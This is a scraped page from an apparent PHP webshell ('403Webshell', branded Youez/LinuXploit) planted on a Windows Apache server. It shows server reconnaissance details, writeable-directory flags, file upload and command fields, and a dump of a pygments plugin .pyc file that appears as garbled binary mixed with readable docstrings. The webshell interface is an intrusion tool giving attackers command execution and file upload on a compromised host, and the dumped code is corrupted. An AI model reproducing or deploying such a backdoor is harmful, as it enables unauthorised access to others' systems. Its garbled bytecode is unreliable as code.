403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.109
Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64
User : SERVERWEB ( 0)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  C:/cygwin64/lib/python3.9/site-packages/pip/_vendor/pygments/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : C:/cygwin64/lib/python3.9/site-packages/pip/_vendor/pygments/__pycache__/plugin.cpython-39.pyc
a

X��e
�@s@dZdZdZdZdZdd�Zdd�Zd	d
�Zdd�Zd
d�Z	dS)a
    pygments.plugin
    ~~~~~~~~~~~~~~~

    Pygments plugin interface. By default, this tries to use
    ``importlib.metadata``, which is in the Python standard
    library since Python 3.8, or its ``importlib_metadata``
    backport for earlier versions of Python. It falls back on
    ``pkg_resources`` if not found. Finally, if ``pkg_resources``
    is not found either, no plugins are loaded at all.

    lexer plugins::

        [pygments.lexers]
        yourlexer = yourmodule:YourLexer

    formatter plugins::

        [pygments.formatters]
        yourformatter = yourformatter:YourFormatter
        /.ext = yourformatter:YourFormatter

    As you can see, you can define extensions for the formatter
    with a leading slash.

    syntax plugins::

        [pygments.styles]
        yourstyle = yourstyle:YourStyle

    filter plugin::

        [pygments.filter]
        yourfilter = yourfilter:YourFilter


    :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
zpygments.lexerszpygments.formatterszpygments.styleszpygments.filterscCs�zddlm}Wnzty�zddlm}WnVty�zddlm}Wn"ttfyngYYYS0||�YYSYn0Yn0|�}t|d�r�|j|d�S|�	|g�SdS)N�)�entry_points)�iter_entry_points�select)�group)
�importlib.metadatar�ImportErrorZimportlib_metadataZpip._vendor.pkg_resourcesr�OSError�hasattrr�get)Z
group_namerr�groups�r�?/usr/lib/python3.9/site-packages/pip/_vendor/pygments/plugin.pyr/s
rccstt�D]}|��VqdS�N)r�LEXER_ENTRY_POINT�load�Z
entrypointrrr
�find_plugin_lexersGsrccs"tt�D]}|j|��fVqdSr)r�FORMATTER_ENTRY_POINT�namerrrrr
�find_plugin_formattersLsrccs"tt�D]}|j|��fVqdSr)r�STYLE_ENTRY_POINTrrrrrr
�find_plugin_stylesQsrccs"tt�D]}|j|��fVqdSr)r�FILTER_ENTRY_POINTrrrrrr
�find_plugin_filtersVsrN)
�__doc__rrrrrrrrrrrrr
�<module>s(

Youez - 2016 - github.com/yon3zu
LinuXploit